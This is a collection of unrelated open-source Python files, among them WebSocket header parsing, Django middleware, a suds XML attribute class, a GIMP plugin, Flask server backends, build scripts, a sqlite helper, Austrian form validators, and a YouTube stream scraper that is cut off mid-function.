X_WEBKIT_DEFLATE_FRAME_EXTENSION = 'x-webkit-deflate-frame' X_WEBKIT_PERMESSAGE_COMPRESSION_EXTENSION = 
'x-webkit-permessage-compress' MUX_EXTENSION = 'mux_DO_NOT_USE' # Status codes # Code STATUS_NO_STATUS_RECEIVED, STATUS_ABNORMAL_CLOSURE, and # STATUS_TLS_HANDSHAKE are pseudo codes to indicate specific error cases. # Could not be used for codes in actual closing frames. # Application level errors must use codes in the range # STATUS_USER_REGISTERED_BASE to STATUS_USER_PRIVATE_MAX. The codes in the # range STATUS_USER_REGISTERED_BASE to STATUS_USER_REGISTERED_MAX are managed # by IANA. Usually application must define user protocol level errors in the # range STATUS_USER_PRIVATE_BASE to STATUS_USER_PRIVATE_MAX. STATUS_NORMAL_CLOSURE = 1000 STATUS_GOING_AWAY = 1001 STATUS_PROTOCOL_ERROR = 1002 STATUS_UNSUPPORTED_DATA = 1003 STATUS_NO_STATUS_RECEIVED = 1005 STATUS_ABNORMAL_CLOSURE = 1006 STATUS_INVALID_FRAME_PAYLOAD_DATA = 1007 STATUS_POLICY_VIOLATION = 1008 STATUS_MESSAGE_TOO_BIG = 1009 STATUS_MANDATORY_EXTENSION = 1010 STATUS_INTERNAL_ENDPOINT_ERROR = 1011 STATUS_TLS_HANDSHAKE = 1015 STATUS_USER_REGISTERED_BASE = 3000 STATUS_USER_REGISTERED_MAX = 3999 STATUS_USER_PRIVATE_BASE = 4000 STATUS_USER_PRIVATE_MAX = 4999 # Following definitions are aliases to keep compatibility. Applications must # not use these obsoleted definitions anymore. STATUS_NORMAL = STATUS_NORMAL_CLOSURE STATUS_UNSUPPORTED = STATUS_UNSUPPORTED_DATA STATUS_CODE_NOT_AVAILABLE = STATUS_NO_STATUS_RECEIVED STATUS_ABNORMAL_CLOSE = STATUS_ABNORMAL_CLOSURE STATUS_INVALID_FRAME_PAYLOAD = STATUS_INVALID_FRAME_PAYLOAD_DATA STATUS_MANDATORY_EXT = STATUS_MANDATORY_EXTENSION # HTTP status codes HTTP_STATUS_BAD_REQUEST = 400 HTTP_STATUS_FORBIDDEN = 403 HTTP_STATUS_NOT_FOUND = 404 def is_control_opcode(opcode): return (opcode >> 3) == 1 class ExtensionParameter(object): """Holds information about an extension which is exchanged on extension negotiation in opening handshake. 
""" def __init__(self, name): self._name = name # TODO(tyoshino): Change the data structure to more efficient one such # as dict when the spec changes to say like # - Parameter names must be unique # - The order of parameters is not significant self._parameters = [] def name(self): return self._name def add_parameter(self, name, value): self._parameters.append((name, value)) def get_parameters(self): return self._parameters def get_parameter_names(self): return [name for name, unused_value in self._parameters] def has_parameter(self, name): for param_name, param_value in self._parameters: if param_name == name: return True return False def get_parameter_value(self, name): for param_name, param_value in self._parameters: if param_name == name: return param_value class ExtensionParsingException(Exception): def __init__(self, name): super(ExtensionParsingException, self).__init__(name) def _parse_extension_param(state, definition): param_name = http_header_util.consume_token(state) if param_name is None: raise ExtensionParsingException('No valid parameter name found') http_header_util.consume_lwses(state) if not http_header_util.consume_string(state, '='): definition.add_parameter(param_name, None) return http_header_util.consume_lwses(state) # TODO(tyoshino): Add code to validate that parsed param_value is token param_value = http_header_util.consume_token_or_quoted_string(state) if param_value is None: raise ExtensionParsingException( 'No valid parameter value found on the right-hand side of ' 'parameter %r' % param_name) definition.add_parameter(param_name, param_value) def _parse_extension(state): extension_token = http_header_util.consume_token(state) if extension_token is None: return None extension = ExtensionParameter(extension_token) while True: http_header_util.consume_lwses(state) if not http_header_util.consume_string(state, ';'): break http_header_util.consume_lwses(state) try: _parse_extension_param(state, extension) except ExtensionParsingException, e: 
raise ExtensionParsingException( 'Failed to parse parameter for %r (%r)' % (extension_token, e)) return extension def parse_extensions(data): """Parses Sec-WebSocket-Extensions header value returns a list of ExtensionParameter objects. Leading LWSes must be trimmed. """ state = http_header_util.ParsingState(data) extension_list = [] while True: extension = _parse_extension(state) if extension is not None: extension_list.append(extension) http_header_util.consume_lwses(state) if http_header_util.peek(state) is None: break if not http_header_util.consume_string(state, ','): raise ExtensionParsingException( 'Failed to parse Sec-WebSocket-Extensions header: ' 'Expected a comma but found %r' % http_header_util.peek(state)) http_header_util.consume_lwses(state) if len(extension_list) == 0: raise ExtensionParsingException( 'No valid extension entry found') return extension_list def format_extension(extension): """Formats an ExtensionParameter object.""" formatted_params = [extension.name()] for param_name, param_value in extension.get_parameters(): if param_value is None: formatted_params.append(param_name) else: quoted_value = http_header_util.quote_if_necessary(param_value) formatted_params.append('%s=%s' % (param_name, quoted_value)) return '; '.join(formatted_params) def format_extensions(extension_list): """Formats a list of ExtensionParameter objects.""" formatted_extension_list = [] for extension in extension_list: formatted_extension_list.append(format_extension(extension)) return ', '.join(formatted_extension_list) # vi:sts=4 sw=4 et
mpl-2.0
feliperfranca/django-nonrel-example
djangotoolbox/middleware.py
85
2801
from django.conf import settings
from django.http import HttpResponseRedirect
from django.utils.cache import patch_cache_control

# Snapshots of the relevant settings, taken once at import time.
LOGIN_REQUIRED_PREFIXES = getattr(settings, 'LOGIN_REQUIRED_PREFIXES', ())
NO_LOGIN_REQUIRED_PREFIXES = getattr(settings, 'NO_LOGIN_REQUIRED_PREFIXES', ())
ALLOWED_DOMAINS = getattr(settings, 'ALLOWED_DOMAINS', None)
NON_REDIRECTED_PATHS = getattr(settings, 'NON_REDIRECTED_PATHS', ())
# Normalized to always end in '/' so startswith() matches whole path
# segments only.
NON_REDIRECTED_BASE_PATHS = tuple(path.rstrip('/') + '/'
                                  for path in NON_REDIRECTED_PATHS)


class LoginRequiredMiddleware(object):
    """
    Redirects to login page if request path begins with a
    LOGIN_REQURED_PREFIXES prefix. You can also specify
    NO_LOGIN_REQUIRED_PREFIXES which take precedence.
    """
    def process_request(self, request):
        # Exemption prefixes take precedence over login-required prefixes.
        for prefix in NO_LOGIN_REQUIRED_PREFIXES:
            if request.path.startswith(prefix):
                return None
        for prefix in LOGIN_REQUIRED_PREFIXES:
            if request.path.startswith(prefix) and \
                    not request.user.is_authenticated():
                # Imported lazily to avoid importing auth views before the
                # app registry is ready.
                from django.contrib.auth.views import redirect_to_login
                return redirect_to_login(request.get_full_path())
        return None


class RedirectMiddleware(object):
    """
    A static redirect middleware. Mostly useful for hosting providers that
    automatically setup an alternative domain for your website. You might
    not want anyone to access the site via those possibly well-known URLs.
    """
    def process_request(self, request):
        # Hostname without the port.
        host = request.get_host().split(':')[0]
        # Turn off redirects when in debug mode, running unit tests, or
        # when handling an App Engine cron job.
        if (settings.DEBUG or host == 'testserver' or
                not ALLOWED_DOMAINS or
                request.META.get('HTTP_X_APPENGINE_CRON') == 'true' or
                request.path.startswith('/_ah/') or
                request.path in NON_REDIRECTED_PATHS or
                request.path.startswith(NON_REDIRECTED_BASE_PATHS)):
            return
        # CONSISTENCY FIX: the guard above uses the module-level
        # ALLOWED_DOMAINS snapshot, while the original did a live
        # settings.ALLOWED_DOMAINS lookup here; use the snapshot for both so
        # the membership test and the redirect target always agree.
        if host not in ALLOWED_DOMAINS:
            return HttpResponseRedirect(
                'http://' + ALLOWED_DOMAINS[0] + request.path)


class NoHistoryCacheMiddleware(object):
    """
    If user is authenticated we disable browser caching of pages in history.
    """
    def process_response(self, request, response):
        # Only add headers when the view has not already set caching policy.
        if 'Expires' not in response and \
                'Cache-Control' not in response and \
                hasattr(request, 'session') and \
                request.user.is_authenticated():
            patch_cache_control(response, no_store=True, no_cache=True,
                                must_revalidate=True, max_age=0)
        return response
bsd-3-clause
wadobo/suds
suds/sax/attribute.py
1
5713
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )

"""
Provides XML I{attribute} classes.
"""

import suds.sax
from logging import getLogger
from suds import *
from suds.sax import *
from suds.sax.text import Text

log = getLogger(__name__)


class Attribute:
    """
    An XML attribute object.
    @ivar parent: The node containing this attribute
    @type parent: L{element.Element}
    @ivar prefix: The I{optional} namespace prefix.
    @type prefix: str
    @ivar name: The I{unqualified} name of the attribute
    @type name: str
    @ivar value: The attribute's value
    @type value: str
    """

    def __init__(self, name, value=None):
        """
        @param name: The attribute's name with I{optional} namespace
            prefix.
        @type name: str
        @param value: The attribute's value
        @type value: str
        """
        self.parent = None
        self.prefix, self.name = splitPrefix(name)
        self.setValue(value)

    def clone(self, parent=None):
        """
        Clone this object.
        @param parent: The parent for the clone.
        @type parent: L{element.Element}
        @return: A copy of this object assigned to the new parent.
        @rtype: L{Attribute}
        """
        a = Attribute(self.qname(), self.value)
        a.parent = parent
        return a

    def qname(self):
        """
        Get the B{fully} qualified name of this attribute
        @return: The fully qualified name.
        @rtype: str
        """
        if self.prefix is None:
            return self.name
        else:
            return ':'.join((self.prefix, self.name))

    def setValue(self, value):
        """
        Set the attributes value
        @param value: The new value (may be None)
        @type value: str
        @return: self
        @rtype: L{Attribute}
        """
        if isinstance(value, Text):
            self.value = value
        else:
            # Wrap plain values so the attribute value always supports the
            # Text API (e.g. escape()).
            self.value = Text(value)
        return self

    def getValue(self, default=Text('')):
        """
        Get the attributes value with optional default.
        @param default: An optional value to be return when the
            attribute's has not been set.
        @type default: str
        @return: The attribute's value, or I{default}
        @rtype: L{Text}
        """
        if self.hasText():
            return self.value
        else:
            return default

    def hasText(self):
        """
        Get whether the attribute has I{text} and that it is not an empty
        (zero length) string.
        @return: True when has I{text}.
        @rtype: boolean
        """
        return ( self.value is not None and len(self.value) )

    def namespace(self):
        """
        Get the attributes namespace.  This may either be the namespace
        defined by an optional prefix, or its parent's namespace.
        @return: The attribute's namespace
        @rtype: (I{prefix}, I{name})
        """
        if self.prefix is None:
            return Namespace.default
        else:
            return self.resolvePrefix(self.prefix)

    def resolvePrefix(self, prefix):
        """
        Resolve the specified prefix to a known namespace.
        @param prefix: A declared prefix
        @type prefix: str
        @return: The namespace that has been mapped to I{prefix}
        @rtype: (I{prefix}, I{name})
        """
        ns = Namespace.default
        if self.parent is not None:
            # Prefix declarations live on elements; delegate upward.
            ns = self.parent.resolvePrefix(prefix)
        return ns

    def match(self, name=None, ns=None):
        """
        Match by (optional) name and/or (optional) namespace.
        @param name: The optional attribute tag name.
        @type name: str
        @param ns: An optional namespace.
        @type ns: (I{prefix}, I{name})
        @return: True if matched.
        @rtype: boolean
        """
        if name is None:
            byname = True
        else:
            byname = ( self.name == name )
        if ns is None:
            byns = True
        else:
            # Only the namespace URI (second tuple member) is significant.
            byns = ( self.namespace()[1] == ns[1] )
        return ( byname and byns )

    def __eq__(self, rhs):
        """
        equals operator

        BUG FIX: the original compared C{self.prefix == rhs.name} -- a
        copy/paste slip that made attributes with equal names but different
        prefixes compare equal.  Compare prefix with prefix.
        """
        return rhs is not None and \
            isinstance(rhs, Attribute) and \
            self.prefix == rhs.prefix and \
            self.name == rhs.name

    def __repr__(self):
        """ get a string representation """
        return \
            'attr (prefix=%s, name=%s, value=(%s))' %\
            (self.prefix, self.name, self.value)

    def __str__(self):
        """ get an xml string representation """
        return self.__unicode__()

    def __unicode__(self):
        """ get an xml string representation """
        n = self.qname()
        if self.hasText():
            v = self.value.escape()
        else:
            v = self.value
        return '%s="%s"' % (n, v)
lgpl-3.0
dotmagic/python-fu
random_shapes.py
1
3826
#!/usr/bin/env python # Random Shapes plugin for The Gimp 2.3.x # Written by Werner Hartnagel 2006/10/23 # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. from gimpfu import * import random class randomSVG: def __init__(self, svg_filename, width, height, interation, shape_position, palette_colors): self.filename = svg_filename self.interation = interation self.shape_position = shape_position self.palette_colors = palette_colors self.data = "<?xml version=\"1.0\" standalone=\"no\"?>\n" self.data+= "<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n" self.data+= "<svg width=\"%s\" height=\"%s\" version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\">\n\n" % (width, height) def get_random_command(self): comm = ["L", "T"] commid = random.randint(0,1) return str(comm[commid]) def get_random_color(self): colors = ["blue","yellow","lime","red","black","green"] colorid = random.randint(0,5) return "style=\"fill:%s\"" % colors[colorid] def get_random_palette_color(self): cur_palette = pdb.gimp_context_get_palette() max_colors = pdb.gimp_palette_get_info(cur_palette) random_number = random.randint(0,max_colors-1) random_color = pdb.gimp_palette_entry_get_color(cur_palette, random_number) return "style=\"fill: rgb(%.0f,%.0f,%.0f)\"" % (random_color.r*255, random_color.g*255, 
random_color.b*255) def addShape(self): path_data="M %i %i" % (random.randint(0,self.shape_position), random.randint(0,self.shape_position)) pdatacount=random.randint(5,20) if self.palette_colors: style = self.get_random_palette_color() else: style = self.get_random_color() for i in xrange(0,pdatacount): path_data+=" %s %i %i" % (self.get_random_command(), random.randint(0,self.shape_position), random.randint(0,self.shape_position)) self.data+= "<path d=\"%s\" %s/>\n" % (path_data, style) def __del__(self): self.data+="\n</svg>\n" f = open(self.filename, "w") f.write(self.data) f.close() def py_random_shapes(svg_filename, width, height, interation, shape_position, palette_colors): mySVG = randomSVG(svg_filename, width, height, interation, shape_position, palette_colors) for i in xrange(0,int(interation)): mySVG.addShape() del mySVG svgdata = pdb.gimp_file_load(svg_filename, svg_filename) # svgdata = pdb.file_svg_load(svg_filename, svg_filename, 72, 400, 400, 0) # svgdata = pdb.gimp_vectors_import_from_string disp1 = gimp.Display(svgdata) # Register with The Gimp register( "python_fu_random_shapes", "random Shapes", "Render a stand-alone Image with random Shapes", "Werner Hartnagel", "(c) 2006, Werner Hartnagel", "2006", "<Toolbox>/Xtns/Python-Fu/Patterns/Random Shapes", "", [ (PF_STRING, "svg_filename", "Filename to export", "/tmp/randomshapes.svg"), (PF_INT32, "width", "Width ", 400), (PF_INT32, "height", "Height ", 400), (PF_SPINNER, "interation", "How many Shapes? ", 80, (1, 1000, 1)), (PF_SPINNER, "shape_position", "max. Shape Position ", 400, (10, 4000, 1)), (PF_TOGGLE, "palette_colors", "Use Colors from current Palette ", 1), ], [], py_random_shapes) main()
gpl-2.0
brettatoms/flask-appconfig
flask_appconfig/server_backends.py
1
1415
from multiprocessing import cpu_count
import socket

# Comma-separated backend preference order tried by the serve command.
DEFAULT = 'tornado,werkzeug-threaded,werkzeug'


def _get_cpu_count():
    """Return the number of CPUs, or raise RuntimeError when unknown."""
    try:
        return cpu_count()
    except NotImplementedError:
        raise RuntimeError('Could not determine CPU count and no '
                           '--instance-count supplied.')


def werkzeug_threaded(app, hostname, port):
    """Serve ``app`` with Werkzeug: one process, one thread per request.

    BUG FIX: this previously passed ``threaded=False``, which made the
    "threaded" backend handle requests strictly sequentially (identical
    to a single-process ``werkzeug`` run).
    """
    return _run_werkzeug(app, hostname, port, processes=1, threaded=True)


def werkzeug(app, hostname, port):
    """Serve ``app`` with Werkzeug using one worker process per CPU."""
    return _run_werkzeug(app, hostname, port,
                         processes=_get_cpu_count(),
                         threaded=False)


def _run_werkzeug(app, hostname, port, **kwargs):
    """Run the Flask/Werkzeug development server.

    :return: True when the server exits normally.
    :raises RuntimeError: for EACCES on a privileged port (< 1024), with a
        hint about root permissions; other socket errors propagate as-is.
    """
    try:
        app.run(hostname, port, debug=False, use_evalex=False, **kwargs)
        return True
    except socket.error as e:
        if not port < 1024 or e.errno != 13:
            raise

        # helpful message when trying to run on port 80 without root
        # permissions
        raise RuntimeError('Could not open socket on {}:{}: {}. '
                           'Do you have root permissions?'
                           .format(hostname, port, e))


def tornado(app, hostname, port):
    """Serve ``app`` through Tornado's WSGI container (single process)."""
    from tornado.wsgi import WSGIContainer
    from tornado.httpserver import HTTPServer
    from tornado.ioloop import IOLoop

    http_server = HTTPServer(WSGIContainer(app))
    http_server.listen(port, address=hostname)
    IOLoop.instance().start()

    return True
mit
sillsdev/DblMetaData
Xmlpp/setup.py
1
2309
#!/usr/local/bin/python
# coding: utf-8

from distutils.core import setup
import py2exe
import sys

# When invoked with no arguments, behave as "setup.py py2exe -q" so a bare
# run builds the executables in quiet mode.
if len(sys.argv) == 1:
    sys.argv.append("py2exe")
    sys.argv.append("-q")


class Target:
    """Bag of py2exe target attributes plus fixed versioninfo metadata."""

    def __init__(self, **kw):
        self.__dict__.update(kw)
        # for the versioninfo resources
        self.version = "0.1.0"
        self.company_name = "SIL International"
        self.copyright = "©2012 Greg Trihus"
        self.name = "Xml pretty print"

################################################################
# A program using wxPython

# The manifest will be inserted as resource into test_wx.exe.  This
# gives the controls the Windows XP appearance (if run on XP ;-)
#
# Another option would be to store it in a file named
# test_wx.exe.manifest, and copy it with the data_files option into
# the dist-dir.
#
manifest_template = '''
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    version="5.0.0.0"
    processorArchitecture="x86"
    name="%(prog)s"
    type="win32"
/>
<description>%(prog)s Program</description>
<dependency>
    <dependentAssembly>
        <assemblyIdentity
            type="win32"
            name="Microsoft.Windows.Common-Controls"
            version="6.0.0.0"
            processorArchitecture="X86"
            publicKeyToken="6595b64144ccf1df"
            language="*"
        />
    </dependentAssembly>
</dependency>
</assembly>
'''

# Windows resource type id for an embedded manifest.
RT_MANIFEST = 24

TargDesc = Target(
    # used for the versioninfo resource
    description = "Pretty print xml file",
    # what to build
    script = "Xmlpp.py",
    other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog="Xmlpp"))],
    icon_resources = [(1, "UNPAK.ico")],
    dest_base = "Xmlpp")

################################################################

setup(
    options = {"py2exe": {"compressed": 1,
                          "optimize": 2,
                          "ascii": 1,
                          "bundle_files": 1,
                          "packages": ["encodings"]}},
    zipfile = None,
    console = [TargDesc],
    scripts = ['Xmlpp.py'],
    )
mit
gioman/QGIS
cmake/FindSIP.py
44
2287
# -*- coding: utf-8 -*-
#
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#     * Redistributions of source code must retain the above copyright
#       notice, this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice, this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the Simon Edwards <simon@simonzone.com> nor the
#       names of its contributors may be used to endorse or promote products
#       derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Simon Edwards <simon@simonzone.com> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Simon Edwards <simon@simonzone.com> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# FindSIP.py
# Copyright (c) 2007, Simon Edwards <simon@simonzone.com>
# Redistribution and use is allowed according to the terms of the BSD license.
# For details see the accompanying COPYING-CMAKE-SCRIPTS file.

import sipconfig

sipcfg = sipconfig.Configuration()

# Emit one "name:value" line per SIP configuration item; these lines are
# parsed by CMake's FindSIP module, so the labels/formats must not change.
for template, value in (
    ("sip_version:%06.0x", sipcfg.sip_version),
    ("sip_version_num:%d", sipcfg.sip_version),
    ("sip_version_str:%s", sipcfg.sip_version_str),
    ("sip_bin:%s", sipcfg.sip_bin),
    ("default_sip_dir:%s", sipcfg.default_sip_dir),
    ("sip_inc_dir:%s", sipcfg.sip_inc_dir),
    ("sip_mod_dir:%s", sipcfg.sip_mod_dir),
):
    print(template % value)
gpl-2.0
aledionigi/trading-with-python
sandbox/spreadGroup.py
78
1891
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 09 18:41:08 2011

@author: jev
"""

import sqlite3 as db
#import sys, os


class Symbols(object):
    ''' class for managing a group of spreads through sqlite '''

    def __init__(self, fName='spreads.db'):
        # One connection and one long-lived cursor per Symbols instance.
        self.con = db.connect(fName)
        self.cur = self.con.cursor()

    def sql(self, query):
        """Execute an arbitrary statement on a fresh cursor; return all rows."""
        cur = self.con.cursor()
        cur.execute(query)
        return cur.fetchall()

    def initDb(self):
        """(Re)create the symbols table from scratch and commit."""
        self.cur.execute("DROP TABLE IF EXISTS tbl_symbols")
        self.cur.execute("""CREATE TABLE tbl_symbols (
            id INTEGER PRIMARY KEY AUTOINCREMENT,
            symbol TEXT,
            secType TEXT DEFAULT 'STK',
            currency TEXT DEFAULT 'USD',
            exchange TEXT DEFAULT 'SMART',
            active BOOLEAN DEFAULT 1)""")
        self.con.commit()

    def addSymbol(self, symbol):
        # Parameterised insert; NOTE: not committed here -- the data is only
        # visible on this connection until a commit happens.
        t = (symbol,)
        self.cur.execute("INSERT INTO tbl_symbols (symbol) VALUES(?) ", t)

    def printTable(self, table):
        """Dump every row of ``table`` to stdout."""
        q = "SELECT * FROM " + table  # insecure, but ? does not work here
        self.cur.execute(q)
        # BUG FIX: converted Python 2 print statements to single-argument
        # print() calls -- identical output on Python 2, and the module now
        # also imports on Python 3.
        print('-' * 10 + table + "-" * 10)
        for row in self.cur:
            print(row)

    def _testFcn(self):
        # Deliberately broken statement kept for manual error-path testing.
        self.sql("insert into tbl_symbols ")

    def showTables(self):
        """Print the name of every table in the database."""
        self.cur.execute("select name from sqlite_master where type='table' ")
        res = self.cur.fetchall()
        for row in res:
            print(row[0])

    def __del__(self):
        self.con.close()


if __name__ == '__main__':
    g = Symbols()
    g.initDb()
    g.showTables()

    g.addSymbol('SPY')
    g.addSymbol('XYZ')

    g.printTable('tbl_symbols')
bsd-3-clause
sigmavirus24/glance
glance/common/location_strategy/location_order.py
18
1079
# Copyright 2014 IBM Corp.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

"""Image location order based location strategy module"""

# Name under which this strategy registers itself.
_STRATEGY_NAME = 'location_order'


def get_strategy_name():
    """Return the name identifying this strategy module."""
    return _STRATEGY_NAME


def init():
    """Initialize the strategy module (nothing to set up)."""
    return None


def get_ordered_locations(locations, **kwargs):
    """
    Order image location list.

    This strategy is the identity ordering: the list is returned exactly
    as received, preserving its natural order.

    :param locations: The original image location list.
    :return: The image location list with original natural order.
    """
    return locations
apache-2.0
CubicERP/geraldo
site/newsite/django_1_0/django/contrib/localflavor/at/forms.py
71
2271
""" AT-specific Form helpers """ import re from django.utils.translation import ugettext_lazy as _ from django.forms.fields import Field, RegexField, Select from django.forms import ValidationError re_ssn = re.compile(r'^\d{4} \d{6}') class ATZipCodeField(RegexField): """ A form field that validates its input is an Austrian postcode. Accepts 4 digits. """ default_error_messages = { 'invalid': _('Enter a zip code in the format XXXX.'), } def __init__(self, *args, **kwargs): super(ATZipCodeField, self).__init__(r'^\d{4}$', max_length=None, min_length=None, *args, **kwargs) class ATStateSelect(Select): """ A Select widget that uses a list of AT states as its choices. """ def __init__(self, attrs=None): from django.contrib.localflavor.at.at_states import STATE_CHOICES super(ATStateSelect, self).__init__(attrs, choices=STATE_CHOICES) class ATSocialSecurityNumberField(Field): """ Austrian Social Security numbers are composed of a 4 digits and 6 digits field. The latter represents in most cases the person's birthdate while the first 4 digits represent a 3-digits counter and a one-digit checksum. The 6-digits field can also differ from the person's birthdate if the 3-digits counter suffered an overflow. This code is based on information available on http://de.wikipedia.org/wiki/Sozialversicherungsnummer#.C3.96sterreich """ default_error_messages = { 'invalid': _(u'Enter a valid Austrian Social Security Number in XXXX XXXXXX format.'), } def clean(self, value): if not re_ssn.search(value): raise ValidationError(self.error_messages['invalid']) sqnr, date = value.split(" ") sqnr, check = (sqnr[:3], (sqnr[3])) if int(sqnr) < 100: raise ValidationError(self.error_messages['invalid']) res = int(sqnr[0])*3 + int(sqnr[1])*7 + int(sqnr[2])*9 \ + int(date[0])*5 + int(date[1])*8 + int(date[2])*4 \ + int(date[3])*2 + int(date[4])*1 + int(date[5])*6 res = res % 11 if res != int(check): raise ValidationError(self.error_messages['invalid']) return u'%s%s %s'%(sqnr, check, date,)
lgpl-3.0
dentaku65/plugin.video.italyalacarta
servers/youtube.py
40
12842
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# pelisalacarta - XBMC Plugin
# Conector para Youtube
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#------------------------------------------------------------
import urlparse, urllib2, urllib, re, httplib
import cgi

from core import config
from core import logger
from core import scrapertools
from core.item import Item

try:
    import simplejson as json
except ImportError:
    import json


def get_video_url(page_url, premium=False, user="", password="", video_password=""):
    """Resolve a YouTube watch URL (or bare 11-char video id) into streams.

    :return: list of [label, url] pairs, reversed so that lower qualities
             come first (as produced by scrapeWebPageForVideoLinks).
    """
    logger.info("[youtube.py] get_video_url(page_url='%s')" % page_url)

    # Accept a bare video id as well as a full URL.
    if not page_url.startswith("http"):
        page_url = "http://www.youtube.com/watch?v=%s" % page_url
    logger.info("[youtube.py] page_url->'%s'" % page_url)

    # Fetch the watch page (cached) with a desktop user agent.
    data = scrapertools.cache_page(
        page_url,
        headers=[['User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3']],
    )

    video_urls = scrapeWebPageForVideoLinks(data)
    video_urls.reverse()

    for video_url in video_urls:
        logger.info(str(video_url))

    return video_urls


def removeAdditionalEndingDelimiter(data):
    """Trim anything after the first "};" so the JSON blob parses cleanly."""
    pos = data.find("};")
    if pos != -1:
        logger.info(u"found extra delimiter, removing")
        data = data[:pos + 1]
    return data


def normalizeUrl(url):
    """Turn a protocol-relative URL ("//...") into an absolute http URL.

    BUG FIX: this module-level function previously declared a bogus
    ``self`` first parameter but was called with a single argument from
    extractFlashVars(), which raised TypeError whenever it ran.
    """
    if url[0:2] == "//":
        url = "http:" + url
    return url


def extractFlashVars(data):
    """Extract the ytplayer.config "args" dict from a watch-page HTML blob."""
    assets = 0
    flashvars = {}
    found = False

    # Locate the line carrying ";ytplayer.config = {...};" and cut out the
    # JSON object between the assignment and the trailing semicolon.
    for line in data.split("\n"):
        if line.strip().find(";ytplayer.config = ") > 0:
            found = True
            p1 = line.find(";ytplayer.config = ") + len(";ytplayer.config = ") - 1
            p2 = line.rfind(";")
            if p1 <= 0 or p2 <= 0:
                continue
            data = line[p1 + 1:p2]
            break
    data = removeAdditionalEndingDelimiter(data)

    if found:
        data = json.loads(data)
        if assets:
            flashvars = data["assets"]
        else:
            flashvars = data["args"]
        for k in ["html", "css", "js"]:
            if k in flashvars:
                flashvars[k] = normalizeUrl(flashvars[k])

    logger.info("Step2: " + repr(data))
    logger.info(u"flashvars: " + repr(flashvars))
    return flashvars


def scrapeWebPageForVideoLinks(data):
    """Build [label, url] pairs for every stream advertised by the page.

    BUG FIX: the no-streams early return used to hand back an empty *dict*,
    which crashed the caller's ``.reverse()``; it now returns a list.
    """
    logger.info("")

    # itag -> human-readable quality label.
    fmt_value = {
        5: "240p h263 flv",
        18: "360p h264 mp4",
        22: "720p h264 mp4",
        26: "???",
        33: "???",
        34: "360p h264 flv",
        35: "480p h264 flv",
        37: "1080p h264 mp4",
        36: "3gpp",
        38: "720p vp8 webm",
        43: "360p h264 flv",
        44: "480p vp8 webm",
        45: "720p vp8 webm",
        46: "520p vp8 webm",
        59: "480 for rtmpe",
        78: "400 for rtmpe",
        82: "360p h264 stereo",
        83: "240p h264 stereo",
        84: "720p h264 stereo",
        85: "520p h264 stereo",
        100: "360p vp8 webm stereo",
        101: "480p vp8 webm stereo",
        102: "720p vp8 webm stereo",
        120: "hd720",
        121: "hd1080"
    }

    video_urls = []
    flashvars = extractFlashVars(data)
    if not flashvars.has_key(u"url_encoded_fmt_stream_map"):
        return video_urls

    if flashvars.has_key(u"ttsurl"):
        logger.info("ttsurl=" + flashvars[u"ttsurl"])

    for url_desc in flashvars[u"url_encoded_fmt_stream_map"].split(u","):
        url_desc_map = cgi.parse_qs(url_desc)
        logger.info(u"url_map: " + repr(url_desc_map))
